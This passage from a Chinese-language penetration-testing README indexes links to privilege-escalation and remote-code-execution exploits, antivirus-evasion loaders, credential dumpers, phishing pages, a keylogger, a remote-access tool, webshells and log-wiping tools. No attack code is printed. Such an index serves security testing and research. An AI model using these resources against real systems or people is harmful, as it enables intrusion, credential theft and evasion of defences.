溢出提权小记](https://klionsec.github.io/2017/04/22/win-0day-privilege/)/[本地保存了一份+Linux&Windows提取脑图](./tools/Local%20Privilege%20Escalation.md) - [Windows常见持久控制脑图](./tools/Windows常见持久控制.png) - [CVE-2019-0803 Win32k漏洞提权工具](./CVE-2019-0803) - [脏牛Linux提权漏洞](https://github.com/Brucetg/DirtyCow-EXP) - [远控免杀从入门到实践之白名单(113个)](https://github.com/TideSec/BypassAntiVirus)|[远控免杀从入门到实践之白名单(113个)总结篇.pdf](./books/远控免杀从入门到实践之白名单(113个)总结篇.pdf) - [Linux提权-CVE-2019-13272 A linux kernel Local Root Privilege Escalation vulnerability with PTRACE_TRACEME](https://github.com/jiayy/android_vuln_poc-exp/tree/master/EXP-CVE-2019-13272-aarch64) - [Linux权限提升辅助一键检测工具](https://github.com/mzet-/linux-exploit-suggester) - [将powershell脚本直接注入到进程中执行来绕过对powershell.exe的限制](https://github.com/EmpireProject/PSInject) - [CVE-2020-2696 – Local privilege escalation via CDE dtsession](https://github.com/0xdea/exploits/blob/master/solaris/raptor_dtsession_ipa.c) - [CVE-2020-0683-利用Windows MSI “Installer service”提权](https://github.com/padovah4ck/CVE-2020-0683/) - [Linux sudo提权辅助工具—查找sudo权限配置漏洞](https://github.com/TH3xACE/SUDO_KILLER) - [Windows提权-CVE-2020-0668:Windows Service Tracing本地提权漏洞](https://github.com/RedCursorSecurityConsulting/CVE-2020-0668) - [Linux提取-Linux kernel XFRM UAF poc (3.x - 5.x kernels)2020年1月前没打补丁可测试](https://github.com/duasynt/xfrm_poc) - [linux-kernel-exploits Linux平台提权漏洞集合](https://github.com/SecWiki/linux-kernel-exploits) - [Linux提权辅助检测Perl脚本](https://github.com/jondonas/linux-exploit-suggester-2)|[Linux提权辅助检测bash脚本](https://github.com/mzet-/linux-exploit-suggester) - [CVE-2020-0796 - Windows SMBv3 LPE exploit #SMBGhost](https://github.com/danigargu/CVE-2020-0796)|[【Windows提取】Windows SMBv3 LPE exploit 已编译版.exe](https://github.com/f1tz/CVE-2020-0796-LPE-EXP)|[SMBGhost_RCE_PoC-远程代码执行EXP](https://github.com/chompie1337/SMBGhost_RCE_PoC)|[Windows_SMBv3_RCE_CVE-2020-0796漏洞复现](./books/Windows_SMBv3_RCE_CVE-2020-0796漏洞复现.pdf) - [getAV---windows杀软进程对比工具单文件版](./tools/getAV/) - [【Windows提权工具】Windows 7 to Windows 10 / Server 2019](https://github.com/CCob/SweetPotato)|[搭配CS的修改版可上线system权限的session](https://github.com/lengjibo/RedTeamTools/tree/master/windows/SweetPotato) - [【Windows提权工具】SweetPotato修改版,用于webshell下执行命令](https://github.com/uknowsec/SweetPotato)|[本地编译好的版本](./tools/SweetPotato.zip)|[点击下载或右键另存为](https://raw.githubusercontent.com/Mr-xn/Penetration_Testing_POC/master/tools/SweetPotato.zip)|[SweetPotato_webshell下执行命令版.pdf](./books/SweetPotato_webshell下执行命令版.pdf) - [【bypass UAC】Windows 8.1 and 10 UAC bypass abusing WinSxS in "dccw.exe"](https://github.com/L3cr0f/DccwBypassUAC/) - [【Windows提权】CVE-2018-8120 Exploit for Win2003 Win2008 WinXP Win7](https://github.com/alpha1ab/CVE-2018-8120) - [【Windows提权 Windows 10&Server 2019】PrintSpoofer-Abusing Impersonation Privileges on Windows 10 and Server 2019](https://github.com/itm4n/PrintSpoofer)|[配合文章食用-pipePotato复现](./books/pipePotato复现.pdf)|[Windows 权限提升 BadPotato-已经在Windows 2012-2019 8-10 全补丁测试成功](https://github.com/BeichenDream/BadPotato) - [【Windows提权】Windows 下的提权大合集](https://github.com/lyshark/Windows-exploits) - [【Windows提权】-CVE-2020-1048 | PrintDemon本地提权漏洞-漏洞影响自1996年以来发布(Windows NT 4)的所有Windows版本](https://github.com/ionescu007/PrintDemon) - [【Windows bypass UAC】UACME-一种集成了60多种Bypass UAC的方法](https://github.com/hfiref0x/UACME) - [CVE-2020–1088: Windows wersvc.dll 任意文件删除本地提权漏洞分析](https://medium.com/csis-techblog/cve-2020-1088-yet-another-arbitrary-delete-eop-a00b97d8c3e2) - [【Windows提权】CVE-2019-0863-Windows中错误报告机制导致的提权-EXP](https://github.com/sailay1996/WerTrigger) - [【Windows提权】CVE-2020-1066-EXP](https://github.com/cbwang505/CVE-2020-1066-EXP) - [【Windows提权】CVE-2020-0787-EXP-ALL-WINDOWS-VERSION-适用于Windows所有版本的提权EXP](https://github.com/cbwang505/CVE-2020-0787-EXP-ALL-WINDOWS-VERSION) - [【Windows提权】CVE-2020-1054-Win32k提权漏洞Poc](https://github.com/0xeb-bp/cve-2020-1054) - [【Linux提权】对Linux提权的简单总结](./books/对Linux提权的简单总结.pdf) - [【Windows提权】wesng-Windows提权辅助脚本](https://github.com/bitsadmin/wesng) ## <span id="head6"> PC</span> - [ 微软RDP远程代码执行漏洞(CVE-2019-0708)](./BlueKeep) - [CVE-2019-0708-python版](./BlueKeep/bluekeep-CVE-2019-0708-python) - [MS17-010-微软永恒之蓝漏洞](https://github.com/Mr-xn/MS17-010) - [macOS-Kernel-Exploit](./macOS-Kernel-Exploit) - [CVE-2019-1388 UAC提权 (nt authority\system)](https://github.com/jas502n/CVE-2019-1388) - [CVE-2019-1405和CVE-2019-1322:通过组合漏洞进行权限提升 Microsoft Windows 10 Build 1803 < 1903 - 'COMahawk' Local Privilege Escalation](https://github.com/apt69/COMahawk) - [CVE-2019-11708](https://github.com/0vercl0k/CVE-2019-11708) - [Telegram(macOS v4.9.155353) 代码执行漏洞](https://github.com/Metnew/telegram-links-nsworkspace-open) - [Remote Desktop Gateway RCE bugs CVE-2020-0609 & CVE-2020-0610](https://www.kryptoslogic.com/blog/2020/01/rdp-to-rce-when-fragmentation-goes-wrong/) - [Microsoft SharePoint - Deserialization Remote Code Execution](https://github.com/Voulnet/desharialize/blob/master/desharialize.py) - [CVE-2020-0728-Windows Modules Installer Service 信息泄露漏洞](https://github.com/irsl/CVE-2020-0728/) - [CVE-2020-0618: 微软 SQL Server Reporting Services远程代码执行(RCE)漏洞](https://www.mdsec.co.uk/2020/02/cve-2020-0618-rce-in-sql-server-reporting-services-ssrs/)|[GitHub验证POC(其实前文的分析文章也有)](https://github.com/euphrat1ca/CVE-2020-0618) - [CVE-2020-0767Microsoft ChakraCore脚本引擎【Edge浏览器中的一个开源的ChakraJavaScript脚本引擎的核心部分】安全漏洞](https://github.com/phoenhex/files/blob/master/pocs/cve-2020-0767.js) - [CVE-2020-0688:微软EXCHANGE服务的远程代码执行漏洞](https://github.com/random-robbie/cve-2020-0688)|[CVE-2020-0688_EXP---另一个漏洞检测利用脚本](https://github.com/Yt1g3r/CVE-2020-0688_EXP)|[又一个cve-2020-0688利用脚本](https://github.com/Ridter/cve-2020-0688)|[Exploit and detect tools for CVE-2020-0688](https://github.com/zcgonvh/CVE-2020-0688) - [CVE-2020-0674: Internet Explorer远程代码执行漏洞检测](https://github.com/binaryfigments/CVE-2020-0674) - [CVE-2020-8794: OpenSMTPD 远程命令执行漏洞](./CVE-2020-8794-OpenSMTPD%20远程命令执行漏洞.md) - [Linux平台-CVE-2020-8597: PPPD 远程代码执行漏洞](https://github.com/marcinguy/CVE-2020-8597) - [Windows-CVE-2020-0796:疑似微软SMBv3协议“蠕虫级”漏洞](https://cert.360.cn/warning/detail?id=04f6a686db24fcfa478498f55f3b79ef)|[相关讨论](https://linustechtips.com/main/topic/1163724-smbv3-remote-code-execution-cve-2020-0796/)|[CVE-2020–0796检测与修复](CVE-2020-0796检测与修复.md)|[又一个CVE-2020-0796的检测工具-可导致目标系统崩溃重启](https://github.com/eerykitty/CVE-2020-0796-PoC) - [SMBGhost_RCE_PoC(CVE-2020-0796)](https://github.com/chompie1337/SMBGhost_RCE_PoC) - [WinRAR 代码执行漏洞 (CVE-2018-20250)-POC](https://github.com/Ridter/acefile)|[相关文章](https://research.checkpoint.com/2019/extracting-code-execution-from-winrar/)|[全网筛查 WinRAR 代码执行漏洞 (CVE-2018-20250)](https://xlab.tencent.com/cn/2019/02/22/investigating-winrar-code-execution-vulnerability-cve-2018-20250-at-internet-scale/) - [windows10相关漏洞EXP&POC](https://github.com/nu11secur1ty/Windows10Exploits) - [shiro rce 反序列 命令执行 一键工具](https://github.com/wyzxxz/shiro_rce) - [CVE-2019-1458-Win32k中的特权提升漏洞【shell可用-Windows提取】](https://github.com/unamer/CVE-2019-1458) - [CVE-2019-1253-Windows权限提升漏洞-AppXSvc任意文件安全描述符覆盖EoP的另一种poc](https://github.com/sgabe/CVE-2019-1253)|[CVE-2019-1253](https://github.com/padovah4ck/CVE-2019-1253) - [【免杀】Cobalt Strike插件,用于快速生成免杀的可执行文件](https://github.com/hack2fun/BypassAV) - [CVE-2020-0674:Internet Explorer UAF 漏洞exp【在64位的win7测试了IE 8, 9, 10, and 11】](https://github.com/maxpl0it/CVE-2020-0674-Exploit) - [SMBGhost_AutomateExploitation-SMBGhost (CVE-2020-0796) Automate Exploitation and Detection](https://github.com/Barriuso/SMBGhost_AutomateExploitation) - [MS Windows OLE 远程代码执行漏洞(CVE-2020-1281)](https://github.com/guhe120/Windows-EoP/tree/master/CVE-2020-1281) ## <span id="head7"> tools-小工具集合</span> - [java环境下任意文件下载情况自动化读取源码的小工具](https://github.com/Artemis1029/Java_xmlhack) - [Linux登录日志清除/伪造](./tools/ssh) - [python2的socks代理](./tools/s5.py) - [dede_burp_admin_path-dedecms后台路径爆破(Windows环境)](./tools/dede_burp_admin_path.md) - [PHP 7.1-7.3 disable_functions bypass](./tools/PHP%207.1-7.3%20disable_functions%20bypass.md) - [一个各种方式突破Disable_functions达到命令执行的shell](https://github.com/l3m0n/Bypass_Disable_functions_Shell) - [【PHP】bypass disable_functions via LD_PRELOA (no need /usr/sbin/sendmail)](https://github.com/yangyangwithgnu/bypass_disablefunc_via_LD_PRELOAD) - [另一个bypass PHP的disable_functions](https://github.com/mm0r1/exploits) - [cmd下查询3389远程桌面端口](./tools/cmd下查询3389远程桌面端口.md) - [伪装成企业微信名片的钓鱼代码](./tools/伪装成企业微信名片的钓鱼代码.txt) - [vbulletin5-rce利用工具(批量检测/getshell)](https://github.com/theLSA/vbulletin5-rce)/[保存了一份源码:vbulletin5-rce.py](./tools/vbulletin5-rce.py) - [CVE-2017-12615](./tools/CVE-2017-12615.py) - [通过Shodan和favicon icon发现真实IP地址](https://github.com/pielco11/fav-up) - [Cobalt_Strike扩展插件](./tools/Cobalt_Strike扩展插件.md) - [Windows命令行cmd的空格替换](./tools/Windows命令行cmd的空格替换.md) - [绕过disable_function汇总](./tools/绕过disable_function汇总.md) - [WAF Bypass](https://chybeta.gitbooks.io/waf-bypass/content/) - [命令注入总结](./tools/命令注入总结.md) - [隐藏wifi-ssid获取 · theKingOfNight's Blog](./books/隐藏wifi-ssid获取%20·%20theKingOfNight's%20Blog.pdf) - [crt.sh证书/域名收集](./tools/crt.sh证书收集.py) - [TP漏洞集合利用工具py3版本-来自奇安信大佬Lucifer1993](https://github.com/Mr-xn/TPscan) - [Python2编写的struts2漏洞全版本检测和利用工具-来自奇安信大佬Lucifer1993](https://github.com/Mr-xn/struts-scan) - [sqlmap_bypass_D盾_tamper](./tools/sqlmap_bypass_D盾_tamper.py) - [sqlmap_bypass_安全狗_tamper](./tools/sqlmap_bypass_安全狗_tamper.py) - [sqlmap_bypass_空格替换成换行符-某企业建站程序过滤_tamper](./tools/sqlmap_bypass_空格替换成换行符-某企业建站程序过滤_tamper.py) - [sqlmap_bypass_云锁_tamper](./tools/sqlmap_bypass_云锁_tamper.py) - [masscan+nmap扫描脚本](./tools/masscan%2Bnmap.py) - [PHP解密扩展](https://github.com/Albert-Zhan/php-decrypt) - [linux信息收集/应急响应/常见后门检测脚本](https://github.com/al0ne/LinuxCheck) - [RdpThief-从远程桌面客户端提取明文凭据辅助工具](https://github.com/0x09AL/RdpThief) - [使用powershell或CMD直接运行命令反弹shell](https://github.com/ZHacker13/ReverseTCPShell) - [FTP/SSH/SNMP/MSSQL/MYSQL/PostGreSQL/REDIS/ElasticSearch/MONGODB弱口令检测](https://github.com/netxfly/x-crack) - [GitHack-.git泄露利用脚本](https://github.com/lijiejie/GitHack) - [GitHacker---比GitHack更好用的git泄露利用脚本](https://github.com/WangYihang/GitHacker) - [SVN源代码泄露全版本Dump源码](https://github.com/admintony/svnExploit) - [多进程批量网站备份文件扫描](https://github.com/sry309/ihoneyBakFileScan) - [Empire](https://github.com/BC-SECURITY/Empire/)|相关文章:[后渗透测试神器Empire详解](https://mp.weixin.qq.com/s/xCtkoIwVomx5f8hVSoGKpA) - [FOFA Pro view 是一款FOFA Pro 资产展示浏览器插件,目前兼容 Chrome、Firefox、Opera](https://github.com/0nise/fofa_view) - [Zoomeye Tools-一款利用Zoomeye 获取有关当前网页IP地址的各种信息(需要登录)](https://chrome.google.com/webstore/detail/zoomeye-tools/bdoaeiibkccgkbjbmmmoemghacnkbklj) - [360 0Kee-Team 的 crawlergo动态爬虫 结合 长亭XRAY扫描器的被动扫描功能](https://github.com/timwhitez/crawlergo_x_XRAY) - [内网神器Xerosploit-娱乐性质(端口扫描|DoS攻击|HTML代码注入|JavaScript代码注入|下载拦截和替换|嗅探攻击|DNS欺骗|图片替换|Web页面篡改|Drifnet)](https://github.com/LionSec/xerosploit) - [一个包含php,java,python,C#等各种语言版本的XXE漏洞Demo](https://github.com/c0ny1/xxe-lab) - [内网常见渗透工具包](https://github.com/yuxiaokui/Intranet-Penetration) - [从内存中加载 SHELLCODE bypass AV查杀](https://github.com/brimstone/go-shellcode)|[twitter示例](https://twitter.com/jas502n/status/1213847002947051521) - [流量转发工具-pingtunnel是把tcp/udp/sock5流量伪装成icmp流量进行转发的工具](https://github.com/esrrhs/pingtunnel) - [内网渗透-创建Windows用户(当net net1 等常见命令被过滤时,一个文件执行直接添加一个管理员【需要shell具有管理员权限l】](https://github.com/newsoft/adduser)|[adduser使用方法](./adduser添加用户.md) - [pypykatz-通过python3实现完整的Mimikatz功能(python3.6+)](https://github.com/skelsec/pypykatz) - [【windows】Bypassing AV via in-memory PE execution-通过在内存中加载多次XOR后的payload来bypass杀软](https://blog.dylan.codes/bypassing-av-via/)|[作者自建gitlab地址](https://git.dylan.codes/batman/darkarmour) - [wafw00f-帮助你快速识别web应用是否使用何种WAF(扫描之前很有用)](https://github.com/EnableSecurity/wafw00f) - [Linux提取其他用户密码的工具(需要root权限)](https://github.com/huntergregal/mimipenguin) - [apache2_BackdoorMod-apache后门模块](https://github.com/VladRico/apache2_BackdoorMod) - [对密码已保存在 Windwos 系统上的部分程序进行解析,包括:Navicat,TeamViewer,FileZilla,WinSCP,Xmangager系列产品(Xshell,Xftp)](https://github.com/uknowsec/SharpDecryptPwd) - [一个简单探测jboss漏洞的工具](https://github.com/GGyao/jbossScan) - [一款lcx在golang下的实现-适合内网代理流量到公网,比如阿里云的机器代理到你的公网机器](https://github.com/cw1997/NATBypass) - [Cobalt Strike Aggressor 插件包](https://github.com/timwhitez/Cobalt-Strike-Aggressor-Scripts) - [Erebus-Cobalt Strike后渗透测试插件,包括了信息收集、权限获取、密码获取、痕迹清除等等常见的脚本插件](https://github.com/DeEpinGh0st/Erebus) - [IP/IP段资产扫描-->扫描开放端口识别运行服务部署网站-->自动化整理扫描结果-->输出可视化报表+整理结果](https://github.com/LangziFun/LangNetworkTopology3) - [A script to scan for unsecured Laravel .env files](https://github.com/tismayil/laravelN00b) - [Struts2漏洞扫描Golang版-【特点:单文件、全平台支持、可在webshell下使用】](https://github.com/x51/STS2G) - [Shiro<=1.2.4反序列化,一键检测工具](https://github.com/sv3nbeast/ShiroScan)|[Apache shiro <= 1.2.4 rememberMe 反序列化漏洞利用工具](https://github.com/acgbfull/Apache_Shiro_1.2.4_RCE) - [完整weblogic 漏洞扫描工具修复版](https://github.com/0xn0ne/weblogicScanner) - [GitHub敏感信息泄露监控](https://github.com/FeeiCN/GSIL) - [Java安全相关的漏洞和技术demo](https://github.com/threedr3am/learnjavabug) - [在线扫描-网站基础信息获取|旁站|端口扫描|信息泄露](https://scan.top15.cn/web/) - [bayonet是一款src资产管理系统,从子域名、端口服务、漏洞、爬虫等一体化的资产管理系统](https://github.com/CTF-MissFeng/bayonet) - [内网渗透中常用的c#程序整合成cs脚本,直接内存加载](https://github.com/uknowsec/SharpToolsAggressor) - [【漏洞库】又一个各种漏洞poc、Exp的收集或编写](https://github.com/coffeehb/Some-PoC-oR-ExP) - [内网渗透代理转发利器reGeorg](https://github.com/sensepost/reGeorg)|**相关文章:**[配置reGeorg+Proxifier渗透内网](https://www.k0rz3n.com/2018/07/06/如何使用reGeorg+Proxifier渗透内网)|[reGeorg+Proxifier实现内网sock5代理](http://jean.ink/2018/04/26/reGeorg/)|[内网渗透之reGeorg+Proxifier](https://sky666sec.github.io/2017/12/16/内网渗透之reGeorg-Proxifier)|[reGeorg+Proxifier使用](https://xz.aliyun.com/t/228) - [Neo-reGeorg重构的reGeorg ](https://github.com/L-codes/Neo-reGeorg) - [get_Team_Pass-获取目标机器上的teamviewerID和密码(你需要具有有效的目标机器账号密码且目标机器445端口可以被访问(开放445端口))](https://github.com/kr1shn4murt1/get_Team_Pass/) - [chromepass-获取chrome保存的账号密码/cookies-nirsoft出品在win10+chrome 80测试OK](./tools/chromepass/)|[SharpChrome-基于.NET 2.0的开源获取chrome保存过的账号密码/cookies/history](https://github.com/djhohnstein/SharpChrome)|[ChromePasswords-开源获取chrome密码/cookies工具](https://github.com/malcomvetter/ChromePasswords) - [java-jdwp远程调试利用](https://github.com/Lz1y/jdwp-shellifier)|相关文章:[jdwp远程调试与安全](https://qsli.github.io/2018/08/12/jdwp/) - [社会工程学密码生成器,是一个利用个人信息生成密码的工具](https://github.com/zgjx6/SocialEngineeringDictionaryGenerator) - [云业CMS(yunyecms)的多处SQL注入审计分析](./books/云业CMS(yunyecms)的多处SQL注入审计分析.pdf)|[原文地址](https://xz.aliyun.com/t/7302)|[官网下载地址](http://www.yunyecms.com/index.php?m=version&c=index&a=index)|[sqlmap_yunyecms_front_sqli_tamp.py](./tools/sqlmap_yunyecms_front_sqli_tamp.py) - [www.flash.cn 的钓鱼页,中文+英文](https://github.com/r00tSe7en/Fake-flash.cn) - [织梦dedecms全版本漏洞扫描](https://github.com/Mr-xn/dedecmscan) - [CVE、CMS、中间件漏洞检测利用合集 Since 2019-9-15](https://github.com/mai-lang-chai/Middleware-Vulnerability-detection) - [Dirble -快速目录扫描和爬取工具【比dirsearch和dirb更快】](https://github.com/nccgroup/dirble) - [RedRabbit - Red Team PowerShell脚本](https://github.com/securethelogs/RedRabbit) - [Pentest Tools Framework - 渗透测试工具集-适用于Linux系统](https://github.com/pikpikcu/Pentest-Tools-Framework) - [白鹿社工字典生成器,灵活与易用兼顾。](https://github.com/HongLuDianXue/BaiLu-SED-Tool) - [NodeJsScan-一款转为Nodejs进行静态代码扫描开发的工具](https://github.com/ajinabraham/NodeJsScan) - [一款国人根据poison ivy重写的远控](https://github.com/killeven/Poison-Ivy-Reload) - [NoXss-可配合burpsuite批量检测XSS](https://github.com/lwzSoviet/NoXss) - [fofa 采集脚本](https://raw.githubusercontent.com/ggg4566/SomeTools/master/fofa_search.py) - [java web 压缩文件 安全 漏洞](https://github.com/jas502n/Java-Compressed-file-security) - [可以自定义规则的密码字典生成器,支持图形界面](https://github.com/bit4woo/passmaker) - [dump lass 工具(绕过/干掉卡巴斯基)](./books/dump%20lass%20工具.pdf)|[loader.zip下载](./tools/loader.zip) - [GO语言版本的mimikatz-编译后免杀](https://github.com/vyrus001/go-mimikatz) - [CVE-2019-0708-批量检测扫描工具](./tools/cve0708.rar) - [dump lsass的工具](https://github.com/outflanknl/Dumpert)|[又一个dump lsass的工具](https://github.com/7hmA3s/dump_lsass) - [Cobalt Strike插件 - RDP日志取证&清除](https://github.com/QAX-A-Team/EventLogMaster) - [xencrypt-一款利用powershell来加密并采用Gzip/DEFLATE来绕过杀软的工具](https://github.com/the-xentropy/xencrypt) - [SessionGopher-一款采用powershell来解密Windows机器上保存的session文件,例如: WinSCP, PuTTY, SuperPuTTY, FileZilla, and Microsoft Remote Desktop,支持远程加载和本地加载使用](https://github.com/Arvanaghi/SessionGopher) - [CVE-2020-0796 Local Privilege Escalation POC-python版本](https://github.com/ZecOps/CVE-2020-0796-LPE-POC)|[CVE-2020-0796 Remote Code Execution POC](https://github.com/ZecOps/CVE-2020-0796-RCE-POC) - [Windows杀软在线对比辅助](https://github.com/r00tSe7en/get_AV) - [递归式寻找域名和api](https://github.com/p1g3/JSINFO-SCAN) - [mssqli-duet-用于mssql的sql注入脚本,使用RID爆破,从Active Directory环境中提取域用户](https://github.com/Keramas/mssqli-duet) - [【Android脱壳】之一键提取APP敏感信息](https://github.com/TheKingOfDuck/ApkAnalyser) - [Shiro系列漏洞检测GUI版本-ShiroExploit GUI版本](https://github.com/feihong-cs/ShiroExploit_GUI) - [通过phpinfo获取cookie突破httponly](./通过phpinfo获取cookie突破httponly.md) - [phpstudy RCE 利用工具 windows GUI版本](https://github.com/aimorc/phpstudyrce) - [WebAliveScan-根据端口快速扫描存活的WEB](https://github.com/broken5/WebAliveScan) - [扫描可写目录.aspx](./tools/扫描可写目录.aspx) - [PC客户端(C-S架构)渗透测试](https://github.com/theLSA/CS-checklist) - [wsltools-web扫描辅助python库](https://github.com/Symbo1/wsltools) - [struts2_check-用于识别目标网站是否采用Struts2框架开发的工具](https://github.com/coffeehb/struts2_check) - [sharpmimi.exe-免杀版mimikatz](./tools/sharpmimi.exe) - [thinkPHP代码执行批量检测工具](https://github.com/admintony/thinkPHPBatchPoc) - [pypykatz-用纯Python实现的Mimikatz](https://github.com/skelsec/pypykatz) - [Flux-Keylogger-具有Web面板的现代Javascript键盘记录器](https://github.com/LimerBoy/Flux-Keylogger) - [JSINFO-SCAN-递归式寻找域名和api](https://github.com/p1g3/JSINFO-SCAN) - [FrameScan-GUI 一款python3和Pyqt编写的具有图形化界面的cms漏洞检测框架](https://github.com/qianxiao996/FrameScan-GUI) - [SRC资产信息聚合网站](https://github.com/cckuailong/InformationGather) - [Spring Boot Actuator未授权访问【XXE、RCE】单/多目标检测](https://github.com/rabbitmask/SB-Actuator) - [JNDI 注入利用工具【Fastjson、Jackson 等相关漏洞】](https://github.com/JosephTribbianni/JNDI) - [各种反弹shell的语句集合页面](https://krober.biz/misc/reverse_shell.php) - [解密weblogic AES或DES加密方法](https://github.com/Ch1ngg/WebLogicPasswordDecryptorUi) - [使用 sshLooterC 抓取 SSH 密码](https://github.com/mthbernardes/sshLooterC)|[相关文章](https://www.ch1ng.com/blog/208.html)|[本地版本](./books/使用sshLooterC抓取SSH密码.pdf) - [redis-rogue-server-Redis 4.x/5.x RCE](https://github.com/AdministratorGithub/redis-rogue-server) - [ew-内网穿透(跨平台)](https://github.com/idlefire/ew) - [xray-weblisten-ui-一款基于GO语言写的Xray 被动扫描管理](https://github.com/virink/xray-weblisten-ui) - [SQLEXP-SQL 注入利用工具,存在waf的情况下自定义编写tamper脚本 dump数据](https://github.com/ggg4566/SQLEXP) - [SRC资产在线管理系统 - Shots](https://github.com/broken5/Shots) - [luject:可以将动态库静态注入到指定应用程序包的工具,目前支持Android/iPhonsOS/Windows/macOS/Linux](https://github.com/lanoox/luject)|[相关文章](https://tboox.org/cn/2020/04/26/luject/) - [CursedChrome:Chrome扩展植入程序,可将受害Chrome浏览器转变为功能齐全的HTTP代理,使你能够以受害人身份浏览网站](https://github.com/mandatoryprogrammer/CursedChrome) - [pivotnacci:通过HTTP隧道进行Socks连接](https://github.com/blackarrowsec/pivotnacci) - [PHPFuck-一款适用于php7以上版本的代码混淆](https://github.com/splitline/PHPFuck)|[[PHPFuck在线版本](https://splitline.github.io/PHPFuck/) - [冰蝎 bypass open_basedir 的马](./tools/冰蝎bypass_open_basedir_shell.md) - [goproxy heroku 一键部署套装,把heroku变为免费的http(s)\socks5代理](https://github.com/snail007/goproxy-heroku) - [自己收集整理的端口、子域、账号密码、其他杂七杂八字典,用于自己使用](https://github.com/cwkiller/Pentest_Dic) - [xFTP6密码解密](./tools/xFTP6密码解密.md) - [Mars-战神TideSec出品的WDScanner的重写一款综合的漏洞扫描,资产发现/变更,域名监控/子域名挖掘,Awvs扫描,POC检测,web指纹探测、端口指纹探测、CDN探测、操作系统指纹探测、泛解析探测、WAF探测、敏感信息检测等等工具](https://github.com/TideSec/Mars) - [Shellcode Compiler:用于生成Windows 和 Linux平台的shellcode工具](https://github.com/NytroRST/ShellcodeCompiler) - [BadDNS 是一款使用 Rust 开发的使用公共 DNS 服务器进行多层子域名探测的极速工具](https://github.com/joinsec/BadDNS) - [【Android脱壳】XServer是一个用于对方法进行分析的Xposed插件](https://github.com/monkeylord/XServer)|[相关文章:Xposed+XServer无需脱壳抓取加密包](https://xz.aliyun.com/t/7669)|[使用xserver对某应用进行不脱壳抓加密包](https://blog.csdn.net/nini_boom/article/details/104400619) - [masscan_to_nmap-基于masscan和nmap的快速端口扫描和指纹识别工具](https://github.com/7dog7/masscan_to_nmap) - [Evilreg -使用Windows注册表文件的反向Shell (.Reg)](https://github.com/thelinuxchoice/evilreg) - [Shecodject工具使用python注入shellcode bypass 火絨,360,windows defender](https://github.com/TaroballzChen/Shecodject) - [Malleable-C2-Profiles-Cobalt Strike的C2隐藏配置文件相关](https://github.com/xx0hcd/Malleable-C2-Profiles)|[渗透利器Cobalt Strike - 第2篇 APT级的全面免杀与企业纵深防御体系的对抗](https://xz.aliyun.com/t/4191) - [AutoRemove-自动卸载360](https://github.com/DeEpinGh0st/AutoRemove) - [ligolo:用于渗透时反向隧道连接工具](https://github.com/sysdream/ligolo) - [RMIScout: Java RMI爆破工具](https://github.com/BishopFox/rmiscout) - [【Android脱壳】FRIDA-DEXDump-【使用Frida来进行Android脱壳】](https://github.com/hluwa/FRIDA-DEXDump) - [Donut-Shellcode生成工具](https://github.com/TheWover/donut) - [JSP-Webshells集合【2020最新bypass某云检测可用】](https://github.com/threedr3am/JSP-Webshells) - [one-scan-多合一网站指纹扫描器,轻松获取网站的 IP / DNS 服务商 / 子域名 / HTTPS 证书 / WHOIS / 开发框架 / WAF 等信息](https://github.com/Jackeriss/one-scan) - [ServerScan一款使用Golang开发的高并发网络扫描、服务探测工具。](https://github.com/Adminisme/ServerScan) - [域渗透-Windows hash dump之secretsdump.py](https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py)|[相关文章](https://github.com/PythonPig/PythonPig.github.io/blob/730be0e55603df96f45680c25c56ba8148052d2c/_posts/2019-07-16-Windows%20hash%20dump%E4%B9%8Bsecretsdump.md) - [WindowsVulnScan:基于主机的漏洞扫描工【类似windows-exp-suggester】](https://github.com/chroblert/WindowsVulnScan) - [基于实战沉淀下的各种弱口令字典](https://github.com/klionsec/SuperWordlist) - [SpoofWeb:一键部署HTTPS钓鱼站](https://github.com/klionsec/SpoofWeb) - [VpsEnvInstall:一键部署VPS渗透环境](https://github.com/klionsec/VpsEnvInstall) - [tangalanga:Zoom会议扫描工具](https://github.com/elcuervo/tangalanga) - [碎遮SZhe_Scan Web漏洞扫描器,基于python Flask框架,对输入的域名/IP进行全面的信息搜集,漏洞扫描,可自主添加POC](https://github.com/Cl0udG0d/SZhe_Scan) - [Taie-RedTeam-OS-泰阿安全实验室-基于XUbuntu私人订制的红蓝对抗渗透操作系统](https://github.com/taielab/Taie-RedTeam-OS) - [naiveproxy-一款用C语言编写类似于trojan的代理工具](https://github.com/klzgrad/naiveproxy) - [BrowserGhost-一个抓取浏览器密码的工具,后续会添加更多功能](https://github.com/QAX-A-Team/BrowserGhost) - [GatherInfo-渗透测试信息搜集/内网渗透信息搜集](https://github.com/Paper-Pen/GatherInfo) - [EvilPDF:一款把恶意文件嵌入在 PDF 中的工具](https://github.com/thelinuxchoice/evilpdf) - [SatanSword-红队综合渗透框架,支持web指纹识别、漏洞PoC检测、批量web信息和端口信息查询、路径扫描、批量JS查找子域名、使用google headless、协程支持、完整的日志回溯](https://github.com/Lucifer1993/SatanSword) - [Get-WeChat-DB-获取目标机器的微信数据库和密钥](https://github.com/A2kaid/Get-WeChat-DB) - [ThinkphpRCE-支持代理IP池的批量检测Thinkphp漏洞或者日志泄露的py3脚本](https://github.com/sukabuliet/ThinkphpRCE) - [fakelogonscreen-伪造(Windows)系统登录页面,截获密码](https://github.com/bitsadmin/fakelogonscreen) - [WMIHACKER-仅135端口免杀横向移动](https://github.com/360-Linton-Lab/WMIHACKER)|[使用方法以及介绍](./books/WMIHACKER(仅135端口免杀横向移动).pdf)|[横向移动工具WMIHACKER](./books/横向移动工具WMIHACKER.pdf)|[原文链接](https://www.anquanke.com/post/id/209665) - [cloud-ranges-部分公有云IP地址范围](https://github.com/pry0cc/cloud-ranges) - [sqltools_ch-sqltools2.0汉化增强版](./ttools/sqltools_ch.rar) - [railgun-poc_1.0.1.7-多功能端口扫描/爆破/漏洞利用/编码转换等](./tools/railgun-poc_1.0.1.7.zip) - [dede_funcookie.php-DEDECMS伪随机漏洞分析 (三) 碰撞点(爆破,伪造管理员cookie登陆后台getshell](./tools/dede_funcookie.php) ## <span id="head8"> 文章/书籍/教程相关</span> - [windwos权限维持系列12篇PDF](./books/Window权限维持) - [Linux 权限维持之进程注入(需要关闭ptrace)](./books/Linux%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81%E4%B9%8B%E8%BF%9B%E7%A8%8B%E6%B3%A8%E5%85%A5%20%C2%AB%20%E5%80%BE%E6%97%8B%E7%9A%84%E5%8D%9A%E5%AE%A2.pdf) | [在不使用ptrace的情况下,将共享库(即任意代码)注入实时Linux进程中。(不需要关闭ptrace)](https://github.com/DavidBuchanan314/dlinject) - 